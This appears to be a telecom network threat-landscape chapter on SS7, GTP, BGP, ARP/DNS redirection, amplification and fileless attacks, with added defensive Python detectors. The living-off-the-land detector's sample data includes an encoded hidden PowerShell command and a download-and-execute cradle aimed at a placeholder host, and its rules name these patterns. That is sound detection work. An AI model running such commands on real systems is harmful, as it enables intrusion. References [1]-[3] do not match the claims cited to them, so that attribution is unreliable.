Network-Centric Security Threats

Security Threat Landscape

Traditional network environments are characterized by well-defined perimeters and trusted domains. Networks were initially designed to create internal segments separated from the external world by a fixed perimeter. The internal network was deemed trustworthy, whereas the external one was considered potentially hostile. Perimeter devices, such as firewalls and intrusion detection systems, have been the traditional technologies used to secure the network.

Threats

In this section, we discuss the threats that can be mapped to the network asset taxonomy. The threats reported here are not exhaustive but representative of the matters covered. Most of them relate to mobile networks, considering the network evolution toward 5G and fixed-mobile network convergence. This section provides an overview of the main relevant security issues. Most of them are already known and under the attention of different standardization bodies, security working groups, and industry alliances, which address them by providing guidelines and countermeasures as well as configuration hardening. However, despite such actions, some of these attacks are still ongoing. This is in part motivated by the availability of open-source attack tools.

For several years now, vulnerable network assets have been exploited as preferred targets. Malicious cyber actors often target network devices, and, once on the device, they can remain there undetected for long periods. After an incident, where administrators and security professionals perform forensic analysis and recover control, a malicious cyber actor with persistent access on network devices can re-attack the recently cleaned hosts. The adoption of a Security Assurance process that covers the entire life cycle, from secure design, secure development, and secure deployment to security monitoring and security management, is necessary to counteract these attacks. There are also cases where attackers do not need to compromise their intended target directly but can achieve their aim by compromising the supply chain where it is least secure. In recent years there has in fact been an increase in breaches caused by vulnerable software. Any given software stack can contain components and libraries from many sources and in differing versions, increasing the need to assess, test, and patch carefully. This potential threat highlights the importance of managing the supply chain.
Another source of well-known network breaches is the use of legacy protocols. Signaling exchange is required to establish and maintain a communication channel or session on telecommunication networks, as well as to allocate resources and manage networks. For example, 2G/3G networks use SS7 (Signalling System 7) and SIGTRAN (SIGnalling Transport), while 4G relies on Diameter; all generations use SIP (Session Initiation Protocol) and GTP (GPRS Tunnelling Protocol). Many fundamental services, such as the short messaging service (SMS), are managed by these protocols. Many of these signaling protocols are outdated and were implemented under a trust model that assumed well-behaved mobile operators, without the need to deploy strong security controls.
In addition, another type of attack vector comes from flaws in the specifications. The paper in [1] is one example of vulnerabilities discovered during a careful analysis of LTE access network protocol specifications, together with a demonstration of how those vulnerabilities can be exploited using an open-source LTE software stack and low-cost hardware. The paper in [2] instead demonstrates the usefulness of adopting a formal verification tool to automatically check whether the desired security properties are satisfied or whether the defined protocols/procedures suffer from ambiguity or under-specification.
To complete the overview of the attack scenario, another vector is the poor configuration of network nodes, as highlighted in [3].
In the following section, the most relevant known network threats are reported according to the following categories.[4][5]

  • TG2.1: Unintentional damage/loss of information on IT assets: this group includes all threats causing unintentional information leakage or sharing due to human errors.
  • TG2.2: Interception and unauthorized acquisition: this group includes any attack, passive or active, where the attacker attempts to listen, intercept, or re-route traffic/data. An example of this would be man-in-the-middle attacks. This group also includes manipulation attacks where the attacker attempts to alter or interfere with data in transit, in particular with signaling messages and routing information.
  • TG2.3: Nefarious activity/abuse: this group includes threats coming from nefarious activities. It requires active attacks targeting the network infrastructure of the victim.
  • TG2.4: Organizational threats: this group includes threats to the organizational sphere.

Threat Group TG2.1: Unintentional damage/loss of information on IT assets

Threat T2.1.1: Erroneous use or administration of devices and systems

Attacks or human errors are exploited to gain unauthorized privileged access to a system, which can lead to the installation of other malicious content or backdoors, or even to physical access to the devices. This is used as part of an attack, regardless of whether the target is a single system/asset or a whole network or facility.

Assets: “Core Network”, “Access Network”, “Infrastructure Network/Area Network”, “Peering Points”.

Related Attack


Threat Group TG2.2: Interception and unauthorized acquisition

Threat T2.2.1: Signaling traffic interception

Most signaling protocols are dated and implemented in an insecure way; most of them were not designed with security features. SS7 (Signaling System 7) and Diameter are signaling protocols used in mobile networks. It is widely known that these protocols have no built-in security defenses and several severe security weaknesses, which attackers can exploit in many ways. SS7 is used to exchange information among different elements of the same network or between roaming partner networks (e.g., call routing, roaming information, features available to the subscriber). Diameter replaces SS7 in the 4G mobile generation. An adversary could exploit signaling system vulnerabilities to redirect calls or text messages (SMS) to a phone number under the attacker’s control.

The exploitation of SS7 design weaknesses to obtain a victim’s location, harvest their messages, and listen in on calls was demonstrated in 2014.[6] Other examples are the demonstrations in [7] and [8]. O2 in Germany confirmed that some of its customers had their accounts drained by attackers who used SS7 to intercept and redirect mTANs to their own phones.[9] In [10], attempted data interception attacks using SS7 were reported.

Assets: “Core Network”, “Peering Points”.

Related Attack

Threat T2.2.2: Data session hijacking

Session hijacking is an attack used to gain unauthorized access by taking over an existing authorized session. For example, the GPRS Tunnelling Protocol (GTP) allows mobile subscribers to maintain a data connection for Internet access while on the move. GTP manages tunnels for transporting IP packets through the core network to the Internet. GTP comprises three parts: control plane (GTP-C), user plane (GTP-U), and charging (GTP'). Since GTP-U messages themselves support neither authentication nor encryption, several attacks on GTP-U are possible. An attack via the GRX (global roaming exchange) network can be conducted by employees of almost any mobile operator as well as by external attackers who have access to an operator’s infrastructure. Such an attacker might be able to craft GTP-U messages and send them to the network to trigger answer messages and thus obtain information (e.g., about network topology), or simply send malicious messages to the network. This may involve guessing a valid TEID (Tunnel Endpoint Identifier) and hijacking the corresponding tunnel, unless the endpoints use unpredictable TEIDs.

Other common hijacking attacks exploit the vulnerabilities of the Border Gateway Protocol (BGP), documented for instance in IETF RFC 4272, “BGP Security Vulnerabilities Analysis”, published in 2006. BGP’s fundamental vulnerabilities relate to the lack of a mechanism to protect the integrity and authenticity of messages in peer-to-peer communications, the lack of a mechanism to validate the authority of an AS (Autonomous System) to announce prefixes or relay route information, and the lack of a mechanism to validate the authenticity of the path attributes in prefix announcements. These vulnerabilities can be exploited by an adversary to perform BGP hijacking, in which the adversary claims to be the origin of prefixes belonging to another network. As a result, traffic is forwarded to the wrong destination, and the attack can be used to intercept, alter, or disrupt Internet traffic.

Assets: “Core Network”, “Peering Points”.
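The authority check that BGP itself lacks (whether an AS may originate a given prefix) is what RPKI-based origin validation adds. The following Python is an added example, not part of this document or of any referenced work: it implements the valid/invalid/not-found outcomes of RFC 6811 against a constructed ROA table (documentation prefixes and private ASNs) and applies them to a constructed set of announcements, one of which is an origin hijack and one a more-specific announcement that exceeds the ROA's maxLength.

```python
"""RPKI-style BGP origin validation over a constructed ROA table (added example)."""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Roa:
    prefix: str        # authorized prefix, e.g. "192.0.2.0/24"
    max_length: int    # longest prefix length the origin may announce under this ROA
    origin_as: int     # AS authorized to originate the prefix


# Constructed ROA table: documentation prefixes and private-use ASNs, not real data.
ROAS = (
    Roa("192.0.2.0/24", 24, 64500),
    Roa("198.51.100.0/22", 24, 64501),
    Roa("2001:db8::/32", 48, 64502),
)


def validate_origin(prefix: str, origin_as: int, roas=ROAS) -> str:
    """Return 'valid', 'invalid' or 'not-found', following the RFC 6811 outcomes."""
    net = ipaddress.ip_network(prefix, strict=False)
    covering = []
    for roa in roas:
        roa_net = ipaddress.ip_network(roa.prefix, strict=False)
        if roa_net.version == net.version and net.subnet_of(roa_net):
            covering.append(roa)
    if not covering:
        return "not-found"          # no ROA covers this prefix at all
    for roa in covering:
        if roa.origin_as == origin_as and net.prefixlen <= roa.max_length:
            return "valid"
    return "invalid"                # covered by a ROA, but wrong origin or too specific


# Constructed announcements as a route collector might see them.
ANNOUNCEMENTS = [
    {"prefix": "192.0.2.0/24",    "origin_as": 64500},
    {"prefix": "192.0.2.0/24",    "origin_as": 64666},   # origin hijack of a covered prefix
    {"prefix": "198.51.100.0/23", "origin_as": 64501},   # more specific, within maxLength
    {"prefix": "198.51.100.0/25", "origin_as": 64501},   # more specific beyond maxLength
    {"prefix": "203.0.113.0/24",  "origin_as": 64530},   # no ROA published
]


def classify(announcements, roas=ROAS):
    """(prefix, origin AS, validation state) for every announcement."""
    return [(a["prefix"], a["origin_as"], validate_origin(a["prefix"], a["origin_as"], roas))
            for a in announcements]


def suspected_hijacks(announcements, roas=ROAS):
    """Announcements a validating router would reject or depreference."""
    return [(p, o) for p, o, state in classify(announcements, roas) if state == "invalid"]


if __name__ == "__main__":
    for row in classify(ANNOUNCEMENTS):
        print(*row)
```

A router performing RPKI validation drops or depreferences "invalid" routes; "not-found" is not evidence of a hijack, only of a missing ROA, which is why publishing ROAs for one's own prefixes is the first defensive step. Origin validation does not address the third weakness named above, the authenticity of the AS path.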

Related Attack

Threat T2.2.3: Traffic eavesdropping

An eavesdropping attack is possible if the traffic is not protected, e.g. if user-plane traffic is not encrypted at the radio access level or if vulnerable/weak cryptographic algorithms are used. Eavesdropping is also possible by exploiting a lack of protection on the backhaul link that connects the radio access network to the core network. In 4G networks the backhaul is composed of IP-based control elements and interfaces, making it vulnerable to IP-based attacks. In addition, eavesdropping can be possible by exploiting the lack of mutual authentication between the radio access node and the core network, the lack of protection against IP-based attacks, or the lack of encryption of data and signaling traffic. If the backhaul link is not encrypted, user security context information, such as part of the keying material currently in use, will be revealed to an eavesdropper, and user-plane traffic will be available to eavesdroppers in the clear. The impact of eavesdropping depends on which traffic is affected. Eavesdropping on control-plane traffic can be more critical, as it may reveal information that allows the attacker to mount further attacks.

Assets: “Radio Access Network”, “Infrastructure Network/Area Network”.

Related Attack

Threat T2.2.4: Traffic redirection

The redirection of data can be accomplished at different levels. On local networks, IPv4 ARP spoofing, IPv6 router advertisement spoofing, or automatic proxy discovery can be exploited. At the Internet level, DNS spoofing is widely used to point legitimate hostnames to fake servers. Ultimately, redirection of data can also be achieved by data manipulation, which is especially feasible when data is not integrity protected.

Assets: “Access Network”, “Core Network”.
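The local-network redirection described above leaves a detectable trace: an IP address that suddenly resolves to a different MAC, or one MAC answering for several IPs including the gateway. The following Python is an added example, not from this document, of a simple ARP-poisoning detector run over a constructed list of ARP replies; the gateway address, the trusted binding and all MAC addresses are invented for the example.

```python
"""ARP-cache poisoning detection over a stream of ARP replies (added example)."""
from collections import defaultdict

# Assumed gateway of the segment and its known-good binding (constructed values,
# in practice taken from DHCP snooping or a static inventory).
GATEWAY_IP = "192.0.2.1"
TRUSTED_BINDINGS = {GATEWAY_IP: "02:00:00:00:00:01"}

# Constructed ARP reply events: (timestamp, sender_ip, sender_mac).
ARP_REPLIES = [
    (1.0, "192.0.2.1",  "02:00:00:00:00:01"),
    (1.5, "192.0.2.10", "02:00:00:00:00:0a"),
    (2.0, "192.0.2.1",  "02:00:00:00:00:66"),   # a second MAC now answers for the gateway
    (2.1, "192.0.2.10", "02:00:00:00:00:66"),   # ...and for a host: both sides of a MITM
    (3.0, "192.0.2.20", "02:00:00:00:00:14"),
    (3.5, "192.0.2.20", "02:00:00:00:00:14"),   # repeat of a known binding: benign
]


def detect_arp_spoofing(replies, trusted=TRUSTED_BINDINGS):
    """Return alerts for IP->MAC changes; first-seen bindings are kept, conflicts are never learned."""
    bindings = dict(trusted)
    ips_claimed = defaultdict(set)      # MAC -> set of IPs it has answered for
    alerts = []
    for ts, ip, mac in replies:
        ips_claimed[mac].add(ip)
        known = bindings.get(ip)
        if known is None:
            bindings[ip] = mac          # learn a new, unconflicted binding
            continue
        if known == mac:
            continue                    # consistent with what we already know
        alerts.append({
            "ts": ts,
            "ip": ip,
            "expected_mac": known,
            "seen_mac": mac,
            # a changed gateway binding redirects the whole segment's traffic
            "severity": "high" if ip in trusted else "medium",
            "reason": ("one MAC answers for several IPs"
                       if len(ips_claimed[mac]) > 1 else "binding changed"),
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoofing(ARP_REPLIES):
        print(alert)
```

Switch-side mitigations in the same spirit are dynamic ARP inspection and static bindings for the gateway. The detector is deliberately conservative and never overwrites a binding on conflict, so a legitimate NIC replacement also raises an alert and needs an operator to clear it.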

Related Attack


Threat Group TG2.3: Nefarious activity/abuse

Threat T2.3.1: The exploitation of software bug

The more the network environment is softwarized, virtualized, and moved onto general commodity hardware, the more it becomes exposed to vulnerabilities due to software bugs and poor configuration. Already today, thousands of software bugs every year [11] impact network devices such as routers, servers, databases, and other functional elements of the networks. This type of threat also includes network failures, where several systems fail to connect or to work together.

Through software bugs it is possible to attack the vulnerable device or the entire infrastructure, causing, for instance, DoS, fraud, and other issues. To help customers manage such situations, many network manufacturers, such as Cisco, Juniper, Ericsson, and Huawei, have set up dedicated PSIRT (Product Security Incident Response Team) services, which collect and analyze vulnerability reports, provide patches for their products, and help their customers address the possible issues by suggesting related solutions.

Assets: “Access Network”, “Core Network”, “Infrastructure Network/Area Network”, “Endpoint Network”.

Related Attack

Threat T2.3.2: Manipulation of hardware and firmware

Attacks against hardware and firmware are especially appealing to attackers. Once they have compromised the firmware, they can safely persist on the device and evade the security measures applied at the OS, application, or software levels. Since the malicious code lives within the firmware of physical components, the threat can easily survive a complete reimaging of the system or even replacement of the hard drive(s). This sort of persistent attack would typically occur as the second stage of a malware infection: once a system is initially compromised, malware could then look for vulnerabilities in the firmware and missing device protections that would allow malicious code to be implanted in the firmware itself. This threat clearly also points to Device/IoT-centric security.

Assets: “Core Network”, “Infrastructure Network/Area Network”, “Endpoint Network”.

Related Attack

Threat T2.3.3: Malicious code/software/activity

Malware is any piece of software written with the intent of damaging devices, stealing data, or otherwise causing harm. Viruses, Trojans, and more recently crypto-miners and ransomware are among the different kinds of malware. Although the primary target for malware is traditionally to “infect” a device (fixed or mobile), malware is also one of the main threats against network infrastructures (e.g. the control plane), and it will become even more dangerous with the emerging network softwarization. When devices are considered, this threat is strongly connected to threat T1.4.3 in Device/IoT-centric security.

Assets: “Core Network”, “Endpoint Network”.

Related Attack

Threat T2.3.4: Remote activities (execution)

Remote activities can take a variety of forms, but in general refer to the process by which an agent can exploit a network vulnerability to run, for example, arbitrary code on a targeted machine or system.

Assets: “Core Network”.

Related Attack

Threat T2.3.5: Malicious code – Signaling amplification attacks

Mobile networks do not have enough radio resources to serve every single customer at the same time. The scarcity of bandwidth requires advanced techniques to reuse idle resources efficiently. The RRC protocol stack reclaims radio resources from a given user when the connection goes idle for a few seconds. When an inactivity timer expires, the radio bearer between the mobile device and the core network is released and those resources become available to be reassigned to another UE. At this stage, the UE moves from the connected to the idle state. Each instance of bearer release and setup involves a significant number of control messages exchanged among nodes within the EPC (Evolved Packet Core); forcing frequent transitions between the connected and idle states therefore multiplies control-plane load, which is what a signaling amplification attack exploits. DNS amplification is another example of an attack that massively exploits open recursive DNS servers, mainly to consume bandwidth (DDoS attacks). The amplification effect lies in the fact that DNS response messages may be substantially larger than DNS query messages.

Assets: “Access Network”, “Radio Access Network”, “Core Network”.
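The size asymmetry the paragraph describes for DNS can be measured directly from a resolver's query log. The following Python is an added example, not from this document: it aggregates constructed log records per source address and flags sources whose response-to-query byte ratio and query volume look like reflection traffic. The addresses, names and sizes are invented, and the thresholds are assumptions to be tuned per resolver.

```python
"""Spotting DNS amplification/reflection abuse in resolver query logs (added example)."""
from collections import defaultdict

# Constructed resolver log records: (client_ip, qname, qtype, query_bytes, response_bytes).
# In a reflection attack the "client" address is the spoofed victim, not the attacker.
DNS_LOG = [
    ("198.51.100.7", "example.com", "A",    45,   61),
    ("198.51.100.7", "example.org", "AAAA", 45,   73),
    ("203.0.113.9",  "example.net", "ANY",  48, 3100),
    ("203.0.113.9",  "example.net", "ANY",  48, 3100),
    ("203.0.113.9",  "example.net", "ANY",  48, 3100),
    ("203.0.113.9",  "example.net", "ANY",  48, 3100),
    ("198.51.100.8", "example.com", "TXT",  45,  420),
]


def amplification_report(records, min_queries=3, min_factor=10.0):
    """Per-source byte amplification factor; a source is flagged only above both thresholds (assumed values)."""
    totals = defaultdict(lambda: {"queries": 0, "q_bytes": 0, "r_bytes": 0, "any_queries": 0})
    for client, _qname, qtype, q_bytes, r_bytes in records:
        t = totals[client]
        t["queries"] += 1
        t["q_bytes"] += q_bytes
        t["r_bytes"] += r_bytes
        if qtype == "ANY":              # ANY answers are a classic way to maximise response size
            t["any_queries"] += 1
    report = {}
    for client, t in totals.items():
        factor = t["r_bytes"] / t["q_bytes"]
        report[client] = {
            "queries": t["queries"],
            "factor": round(factor, 1),
            "any_share": round(t["any_queries"] / t["queries"], 2),
            "suspicious": t["queries"] >= min_queries and factor >= min_factor,
        }
    return report


def suspected_reflection_targets(records, **thresholds):
    """Addresses that should be rate-limited (response rate limiting) rather than answered in full."""
    return sorted(c for c, r in amplification_report(records, **thresholds).items()
                  if r["suspicious"])


if __name__ == "__main__":
    for client, row in amplification_report(DNS_LOG).items():
        print(client, row)
```

Because the flagged address is the victim whose source address was spoofed, the right response is response rate limiting and refusing recursion to non-customers, not blocking the address as if it were the attacker; the source-address validation that would stop the spoofing itself has to happen at the attacker's upstream network.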

Related Attack


Threat Group TG2.4: Organizational threats (failure/malfunction)

Threat T2.4.1: Failures of devices or systems

System failures include incidents caused by the failure of a system, for example hardware failures, software failures, or errors in procedures or policies. An example is a software bug in a system such as an HLR that suddenly stops operating and consequently prevents all subscribers from connecting. This threat clearly also points to Device/IoT-centric security.

Assets: “Access Network”, “Core Network”, “Infrastructure Network/Area Network”.

Related Attack

Threat T2.4.2: Supply chain

A supply chain threat refers to the compromise of an asset, for instance a software provider’s infrastructure and commercial software, with the aim of indirectly damaging a certain target (e.g., the software provider’s clients). This type of attack is typically used as the first step in a series of attacks; more concisely, it is used as a stepping stone for further exploitation once a foothold is gained on the target system or systems. Attackers do not need to compromise their intended target directly but, in many cases, can achieve their aim by compromising the supply chain where it is least secure. This potential threat highlights the importance of managing the supply chain holistically and driving out or mitigating insecure elements.

Assets: “Infrastructure Network”.

Related Attack

Threat T2.4.3: Software bug

A security bug is a software bug that can be exploited to gain unauthorized access or privileges on a computer system. Software bugs can affect ICT systems such as routers, servers, and databases, and in this way impact networks or services. This type of threat also includes complex failures, such as network failures where several systems fail to connect or otherwise work together.

Assets: “Access Network”, “Core Network”, “Infrastructure Network/Area Network”.

Related Attack


Emerging Threats in COVID-19 Era

The advent of COVID-19 generated the following new Network-centric threats:

Threat 2.3.6: Exploitation of vulnerabilities in services and remote tools – COVID-19

With the increase in remote workers during the COVID-19 period, many users no longer relied on company-monitored infrastructure to access sensitive information on the network. Malicious cyber actors are taking advantage of this mass move to telework by exploiting a variety of publicly known vulnerabilities in VPNs and other remote working tools and software. In several cases, CISA and NCSC have observed actors scanning for publicly known vulnerabilities in Citrix. The Citrix vulnerability CVE-2019-19781 and its exploitation have been widely reported since early January 2020. Similarly, known vulnerabilities affecting VPN products from Pulse Secure, Fortinet, and Palo Alto have been exploited. The surge in teleworking has also led to an increase in the use of Microsoft’s Remote Desktop Protocol (RDP). Attacks on unsecured RDP endpoints (i.e., those exposed to the Internet) are widely reported online, and recent analysis has identified a 127% increase in exposed RDP endpoints [12].

Threat 2.5.1: Physical attack – COVID-19

Conspiracy theories around 5G and health have been circulating in Europe for the past 18 months or so, but have recently morphed into claims that COVID-19 is being caused by 5G [13]. Base station attacks have increased due to disinformation around 5G. There have been several attacks on base stations around the world, ranging from cables being hacked out of the masts to petrol being poured in and around the equipment and then set alight. The UK appears to have been a focus for these attacks, with occurrences across the country. Other examples include New Zealand, the Netherlands, and Ireland. The attacks on base stations have impacted the resilience, availability, and business continuity of mobile network services.


Emerging Threats in 2021

The following is the list of Network-centric security threats that emerged in 2021.

Threat T2.1.2: Security misconfigurations in systems/networks

Security misconfiguration can happen at any level, including poorly configured APIs, network functions, access control rules, network slices, administration rights, virtualised environments, traffic isolation, edge nodes, orchestration software, and firewalls. The exploitation of a misconfigured system creates the opportunity for a threat actor to reach critical assets in the network.

Threat 2.3.7: Exploitation of System Administrative Tools and Fileless malware

Fileless malware is designed to bypass familiar detection controls and infiltrate key systems by ‘living off the land’, using approved platforms or software tools that already exist within corporate networks. This approach allows attackers to get around common detection methods that scan for malicious file attachments. In addition, the use of existing system tools means malicious actors do not have to design their own attack framework, which decreases the time required for malware development. It is expected that attackers will use fileless malware to compromise network service providers rather than specific groups, and then use the providers' existing infrastructure to attack downstream clients. A study conducted by Positive Technologies shows that more than 50% of threat groups leverage publicly available penetration testing and system administration tools to develop attack strategies. Exploitation of system administration and penetration testing tools, such as Cobalt Strike, PowerShell Empire, and BloodHound, is in fact increasing. Cybercriminals are using these and other legitimate admin tools to carry out and hide their activities, a tactic known as living off the land. By making use of legitimate admin tools that are already installed on target computers and running scripts and shellcode directly in memory, attackers can greatly reduce the chances of being detected, as the attack creates fewer new files that antivirus and other detection tools can spot. The result is that these attacks generally go undetected.
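The living-off-the-land patterns described above (in-memory script execution, hidden or encoded PowerShell invocations, legitimate tools launched from unexpected parents) are what endpoint detection rules key on. The following Python is an added example, not from this document or from any vendor product: it applies a small set of such rules to constructed process-creation records shaped like a simplified Sysmon Event ID 1. The rule names, severities and sample command lines are assumptions made for the example.

```python
"""Detection of living-off-the-land patterns in process-creation logs (added example)."""
import re

# Constructed events shaped like a simplified Sysmon Event ID 1 record (all values invented).
EVENTS = [
    {"pid": 1, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile Get-Process"},
    {"pid": 2, "parent": "winword.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -nop -enc QQBBAEEA"},
    {"pid": 3, "parent": "cmd.exe", "image": "powershell.exe",
     "cmdline": "powershell IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')"},
    {"pid": 4, "parent": "services.exe", "image": "rundll32.exe",
     "cmdline": "rundll32.exe shell32.dll,Control_RunDLL"},
]

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# (rule name, pattern over the command line, severity); names and severities are assumptions.
RULES = [
    ("encoded_command", re.compile(r"(?i)\s-(e|ec|enc|encodedcommand)\s"), "high"),
    ("hidden_window",   re.compile(r"(?i)\s-w(indowstyle)?\s+hidden\b"), "medium"),
    ("download_cradle", re.compile(r"(?i)(downloadstring|downloadfile|invoke-webrequest)"), "high"),
    ("memory_exec",     re.compile(r"(?i)(\biex\b|invoke-expression)"), "medium"),
]


def score_event(event):
    """Findings for one event: matching command-line rules plus a parent/child anomaly check."""
    findings = [(name, sev) for name, pat, sev in RULES if pat.search(event["cmdline"])]
    # An Office application spawning a script host is a common initial-access pattern.
    if event["parent"].lower() in OFFICE_PARENTS and event["image"].lower() in SCRIPT_HOSTS:
        findings.append(("office_spawns_script_host", "high"))
    return findings


def triage(events):
    """Map pid -> findings for events that matched anything; benign events are omitted."""
    result = {}
    for event in events:
        findings = score_event(event)
        if findings:
            result[event["pid"]] = findings
    return result


def highest_severity(findings):
    """Roll a finding list up to its worst severity, or None when nothing matched."""
    order = {"medium": 1, "high": 2}
    return max((sev for _name, sev in findings), key=order.get, default=None)


if __name__ == "__main__":
    for pid, findings in triage(EVENTS).items():
        print(pid, highest_severity(findings), findings)
```

Rules like these produce false positives on their own (administrators legitimately use encoded commands), so the value lies in correlating a match with the parent process and with where the script host connects, and in alerting on the combination rather than on any single rule; enabling PowerShell script block logging provides the decoded content needed to confirm a hit.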

Threat T2.3.8: Exploitation of application programming interfaces (APIs)

The adoption of Application Programming Interfaces (APIs) has increased in recent years with their use in 5G networks. The shift to service-based interfaces within the 5G core and the increased use of API-based communication exposed to external networks introduce a new attack surface. A poorly designed or configured API with inaccurate access control rules may expose core network functions and sensitive parameters. The exploitation can target different types of API, related to internal network functions, internetworking interfaces, roaming interfaces, and the like, exposed in different layers of the network.


[1] M. Armbrust, A. Fox, R. Griffith, A. Joseph, R. Katz, A. Konwinski, G. Lee, D. Patterson, A. Rabkin, I. Stoica and M. Zaharia, “Above the Clouds: A Berkeley View of Cloud Computing,” University of California at Berkeley, Technical Report UCB/EECS-2009-28, February 2009.

[2] P. Mell and T. Grance, “The NIST Definition of Cloud Computing,” 2019.

[3] S. Chandna, R. Singh and F. Akhtar, “Data Scavenging Threat in Cloud Computing,” International Journal of Advances in Computer Science and Cloud Computing, 2014.

[4] GSMA, “Mobile Telecommunications Security Threat Landscape,” January 2019, https://www.gsma.com/aboutus/resources/mobile-telecommunications-security-threat-landscape

[5] ENISA, “Threat Landscape 2018,” https://www.enisa.europa.eu/topics/threat-risk-management/threats-and-trends/enisa-threat-landscape

[6] “White hats do an NSA, figure out LIVE PHONE TRACKING via protocol vuln,” The Register, 2014, https://www.theregister.co.uk/2014/12/26/ss7_attacks/

[7] T. Engel, “SS7: Locate. Track. Manipulate,” 2014, https://imsicatcher.info/article/ss7-locate-track-manipulate/

[8] Positive Technologies, “SS7 Attack Discovery,” 2016, https://www.ptsecurity.com/upload/corporate/ww-en/products/documents/ss7/PT-TAD-Product-Brief-eng.pdf

[9] “Schwachstelle im Mobilfunknetz: Kriminelle Hacker räumen Konten leer,” Süddeutsche Zeitung, https://www.sueddeutsche.de/digital/it-sicherheit-schwachstelle-im-mobilfunknetz-kriminelle-hacker-raeumen-konten-leer-1.3486504

[10] “Tunnel Vision: Malicious data interception via SS7,” AdaptiveMobile, https://www.adaptivemobile.com/blog/malicious-data-interception-via-ss7

[11] See https://www.cvedetails.com/vulnerabilities-by-types.php

[12] CISA, “COVID-19 Exploited by Malicious Cyber Actors,” Alert AA20-099A, https://us-cert.cisa.gov/ncas/alerts/aa20-099a

[13] BBC, “The people who think coronavirus is caused by 5G,” https://www.bbc.com/news/av/stories-53285610